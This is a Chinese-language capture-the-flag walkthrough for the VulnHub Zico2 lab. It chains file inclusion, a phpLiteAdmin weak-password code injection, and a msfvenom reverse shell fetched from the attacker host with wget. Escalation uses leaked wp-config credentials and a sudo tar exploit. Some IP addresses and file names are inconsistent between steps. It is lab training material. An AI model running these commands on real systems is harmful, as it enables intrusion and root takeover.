一、靶机下载地址
https://www.vulnhub.com/entry/zico2-1,210/
二、信息收集
1、主机发现
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 '00:0C:29:FC:03:C3'
2、指纹识别
# 使用命令
whatweb 192.168.145.184
3、端口扫描
# 使用命令
nmap 192.168.145.184 -p- -sV
4、目录扫描
# 使用命令
dirsearch -u "http://192.168.145.184"
三、获取shell
1、访问靶机IP地址
2、将过测试发现http://192.168.145.184/view.php?page=tools.html页面,可能存在文件包含漏洞
3、输入page
参数后输入文件名,发现包含成功存在文件包含漏洞
# 使用命令
http://192.168.145.184/view.php?page=../../etc/passwd
4、拼接/dbadmin
路径发现登录界面,且使用的phpLiteAdmin框架
5、使用searchsploit工具扫描phpLiteAdmin框架存在的漏洞
# 使用命令
searchsploit phpLiteAdmin
6、将24044.txt文件,导入到当前目录下
# 使用命令
cp /usr/share/exploitdb/exploits/php/webapps/24044.txt .
7、查看24044.txt文件内容,得到使用方法,攻击者可以创建数据库,数据库中表的字段写入一句话木马
# 使用命令
cat 24044.txt
8、通过弱口令admin进入phpliteadmin后台,写入<?php phpinfo();?>,之后通过文件包含执行命令
9、可以利用这个漏洞,直接getshell,思路为用kali下msfvenom生成一个后门文件,然后利用之前的漏洞,命令执行,让靶机将后门文件主动下载到本机,然后弹回shell
# 使用命令
#创建后门文件
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.145.146 LPORT=5555 -f elf -o shell.el
# 将后门文件复制到apache的网站根目录
cp shell.elf /var/www/html
# 赋予后门文件可读可写可执行权限
chmod 777 /var/www/html/shell.elf
# 启动攻击机的apache服务
service apache2 start
10、利用之前的命令执行漏洞,让靶机主动下载该文件
# 使用命令
<?php system("cd /tmp;wget http://192.168.145.146/shell.elf;chmod 777 shell.elf;./shell.elf");?>
11、启动 msf,输入命令 msfconsole ,设置之前生成后门文件所使用的payload模块
# 使用命令
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.236.137
set lport 5555
run
12、利用之前的文件包含漏洞,将创建的shell.php执行一下,发现已经成功getshell
# 使用命令
http://192.168.145.184/view.php?page=../../../../../../../usr/databases/shell.php
四、提权
1、获取交互式shell
# 使用命令
shell
python -c 'import pty; pty.spawn("/bin/bash")'
2、进入到 /home/zico
目录,查看 to_do.txt
文件
# 使用命令
cd /home/zico
cat /to_do.txt
3、进入到wordpress目录下,发下wordpress配置文件,查看此文件,发现账号密码
# 使用命令
cd wordpress
ls -al
cat wp-config.php
4、使用 ssh 远程连接
# 使用命令
ssh zico@192.168.145.184
5、输入 sudo -l ,查看可执行的命令
# 使用命令
sudo -l
6、使用辅助网站,执行命令进行提权
# 辅助网站
https://gtfobins.github.io/
7、执行命令,成功提权
# 使用命令
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
8、进入root目录,获取到flag.txt文件
# 使用命令
cd /root
cat flag.txt